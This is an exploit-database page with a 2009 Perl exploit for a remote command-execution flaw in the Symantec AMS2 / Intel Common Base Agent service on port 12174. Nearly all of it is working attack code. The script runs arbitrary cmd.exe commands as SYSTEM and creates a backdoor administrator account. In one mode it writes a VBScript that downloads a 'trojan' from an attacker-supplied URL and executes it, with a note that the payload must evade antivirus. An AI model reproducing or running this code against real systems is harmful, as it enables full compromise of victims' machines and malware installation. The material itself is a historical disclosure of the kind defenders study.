[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Multiple Symantec Products Intel Common Base Agent Remote Command Execution
# Published : 2009-04-28
# Author : Kingcope
# Previous Title : Autodesk IDrop ActiveX Remote Code Execution Exploit
# Next Title : ARD-9808 DVR Card Security Camera Arbitrary Config Disclosure Vuln
#The AMS2 (Alert Management Systems 2) component of multiple Symantec products is prone to a remote #command-execution vulnerability because the software fails to adequately sanitize user-supplied #input.
#Successfully exploiting this issue will allow an attacker to execute arbitrary commands with #SYSTEM-level privileges, completely compromising affected computers. Failed exploit attempts will #result in a denial-of-service condition.
# # # # # # # # # # # # # # # # # # # # # # # # #
### SYMANTEC AV w/ INTEL FILE TRANSFER SERVICE
### REMOTE SYSTEM LEVEL EXPLOIT
### USE AT YOUR OWN RISK!
### by Kingcope in 2009
# # # # # # # # # # # # # # # # # # # # # # # # #
use IO::Socket;
sub rce {
($target, $cmmd) = @_;
$sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => '12174',
Proto => 'tcp') || goto lbl;
$magic = sprintf("%d", 0xc0d3b4b3);
$command = "cmd.exe /C $cmmd | exit $magic";
$cmd = "$command";
$req = "x00x00x00x00" . pack("v", length($cmd)+1) . $cmd . "x00";
print $sock $req;
read($sock, $res, 0x14);
$resp = substr($res, 0x10, 4);
if ($resp eq pack("L", 0xc0d3b4b3)) {
print "SUCCESS!n";
} else {
print "COMMAND FAILEDn";
}
return;
lbl:
print "PORT CLOSEDn";
exit;
}
sub usage {
print "usage: perl xpl.pl [-a <target> <username> <password>] [-a2 <target> <username> <password> <administrators groupname> [-d <target> <trojan url>] [-t <target> ]n";
print "-a IS ADDUSER WITH SID METHODn";
print "-a2 IS ADDUSER BY NAMEn";
print "-t IS TESTn";
print "-d IS DOWNLOAD AND EXEC, EXE FILE MUST NOT BE DETECTABLE BY SYMANTEC AVn";
print "Example: perl xpl.pl -a www.symantec.com r00t p455n";
exit;
}
print "n*** Symantec AV Remote Exploitn*** by Kingcope in 2009nn";
if ($#ARGV < 1) {
usage();
}
$specify = $ARGV[0];
$target = $ARGV[1];
if ($specify eq "-d" && $#ARGV != 2) {
usage();
}
if ($specify eq "-a" && $#ARGV != 3) {
usage();
}
if ($specify eq "-a2" && $#ARGV != 4) {
usage();
}
if ($specify eq "-t" && $#ARGV != 1) {
usage();
}
$|=1;
if ($specify eq "-d") {
$trojanurl = $ARGV[2];
$getcred[0] = "echo Function SaveBinaryData(FileName, ByteArray) > c:\getcreds.vbs";
$getcred[1] = "echo Const adTypeBinary = 1 >> c:\getcreds.vbs";
$getcred[2] = "echo Const adSaveCreateOverWrite = 2 >> c:\getcreds.vbs";
$getcred[3] = "echo Dim BinaryStream >> c:\getcreds.vbs";
$getcred[4] = "echo Set BinaryStream = CreateObject("ADODB.Stream") >> c:\getcreds.vbs";
$getcred[5] = "echo BinaryStream.Type = adTypeBinary >> c:\getcreds.vbs";
$getcred[6] = "echo BinaryStream.Open >> c:\getcreds.vbs";
$getcred[7] = "echo BinaryStream.Write ByteArray >> c:\getcreds.vbs";
$getcred[8] = "echo BinaryStream.SaveToFile FileName, adSaveCreateOverWrite >> c:\getcreds.vbs";
$getcred[9] = "echo End Function >> c:\getcreds.vbs";
$getcred[10] = "echo Sub HTTPDownload( myURL, myPath ) >> c:\getcreds.vbs";
$getcred[11] = "echo Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> c:\getcreds.vbs";
$getcred[12] = "echo objHTTP.Open "GET", myURL, False >> c:\getcreds.vbs";
$getcred[13] = "echo objHTTP.Send >> c:\getcreds.vbs";
$getcred[14] = "echo SaveBinaryData myPath, objHTTP.ResponseBody >> c:\getcreds.vbs";
$getcred[15] = "echo End Sub >> c:\getcreds.vbs";
$getcred[16] = "echo HTTPDownload "$trojanurl", "c:\installer.exe" >> c:\getcreds.vbs";
$getcred[17] = "echo Set shell = CreateObject("WScript.Shell") >> c:\getcreds.vbs";
$getcred[18] = "echo Set objEnv = shell.Environment("Process") >> c:\getcreds.vbs";
$getcred[19] = "echo Set objEnv2 = shell.Environment("User") >> c:\getcreds.vbs";
$getcred[20] = "echo Set objEnv3 = shell.Environment("System") >> c:\getcreds.vbs";
$getcred[21] = "echo sysRoot = objEnv("systemroot") >> c:\getcreds.vbs";
$getcred[22] = "echo userProfile = objEnv("userprofile") >> c:\getcreds.vbs";
$getcred[23] = "echo objEnv2("Path") = sysRoot ^& ";" ^& sysRoot ^&"\system32;" ^& sysRoot ^& "\temp;" ^& sysRoot ^& "\wbem" >> c:\getcreds.vbs";
$getcred[24] = "echo objEnv3("Path") = sysRoot ^& ";" ^& sysRoot ^&"\system32;" ^& sysRoot ^& "\temp;" ^& sysRoot ^& "\wbem" >> c:\getcreds.vbs";
$getcred[25] = "echo objEnv2("TEMP") = sysRoot ^& "\temp" >> c:\getcreds.vbs";
$getcred[26] = "echo objEnv2("TMP") = sysRoot ^& "\temp" >> c:\getcreds.vbs";
$getcred[27] = "echo objEnv3("TEMP") = sysRoot ^& "\temp" >> c:\getcreds.vbs";
$getcred[28] = "echo objEnv3("TMP") = sysRoot ^& "\temp" >> c:\getcreds.vbs";
$getcred[29] = "echo shell.CurrentDirectory = "c:\" >> c:\getcreds.vbs";
$getcred[30] = "echo shell.Run Chr(34) ^& "c:\installer.exe" ^& Chr(34), 1, false >> c:\getcreds.vbs";
$getcred[31] = "echo Set shell = Nothing >> c:\getcreds.vbs";
$commandx = $getcred[0];
for ($k=1;$k<=31;$k++) {
$commandx .= " && ".$getcred[$k];
}
print "UPLOAD AND RUN KIT .. ";
rce($target, "$commandx && c:\getcreds.vbs");
sleep(3);
print "n";
print "DELETE KIT FETCHER .. ";
rce($target, "del c:\getcreds.vbs");
print "COMPLETED....";
}
if ($specify eq "-a") {
$getcreds[0] = "echo strComputer = "." > c:\getcred.vbs";
$getcreds[1] = "echo strSID = "S-1-5-32-544" >> c:\getcred.vbs";
$getcreds[2] = "echo Set objWMIService = GetObject("winmgmts:\\" ^& strComputer ^& "\root\cimv2") >> c:\getcred.vbs";
$getcreds[3] = "echo Set objSID = objWMIService.Get("Win32_SID='" ^& strSID ^& "'") >> c:\getcred.vbs";
$getcreds[4] = "echo groupname=objSID.AccountName >> c:\getcred.vbs";
$getcreds[5] = "echo Set objNetwork = WScript.CreateObject("WScript.Network") >> c:\getcred.vbs";
$getcreds[6] = "echo Set objGroup = GetObject("WinNT://" ^& objNetwork.ComputerName ^& "/"^&groupname^&",group") >> c:\getcred.vbs";
$getcreds[7] = "echo Admin_Name = WScript.Arguments(0) >> c:\getcred.vbs";
$getcreds[8] = "echo Path = "WinNT://" ^& objNetwork.ComputerName ^& "/" ^& Admin_Name >> c:\getcred.vbs";
$getcreds[9] = "echo If Not objGroup.IsMember(Path) Then >> c:\getcred.vbs";
$getcreds[10] = "echo objGroup.Add(Path) >> c:\getcred.vbs";
$getcreds[11] = "echo End If >> c:\getcred.vbs";
$getcreds[12] = "echo Set objGroup = Nothing >> c:\getcred.vbs";
$getcreds[13] = "echo set objNetwork = Nothing >> c:\getcred.vbs";
$username = $ARGV[2];
$password = $ARGV[3];
$commandxx = $getcreds[0];
for ($k=1;$k<=13;$k++) {
$commandxx .= " && " . $getcreds[$k];
}
print "RUN ADD USER .. ";
rce($target, "net user $username $password /add");
sleep(3);
print "n";
print "RUN ADD TO GROUP .. ";
rce($target, "$commandxx && c:\getcred.vbs $username && del c:\getcred.vbs");
}
if ($specify eq "-a2") {
$username = $ARGV[2];
$password = $ARGV[3];
$admin = $ARGV[4];
print "RUN ADD USER .. ";
rce($target, "net user $username $password /add && net localgroup $admin $username /add");
}
if ($specify eq "-t") {
print "RUN TEST $target .. ";
rce($target, "echo ELITE .");
}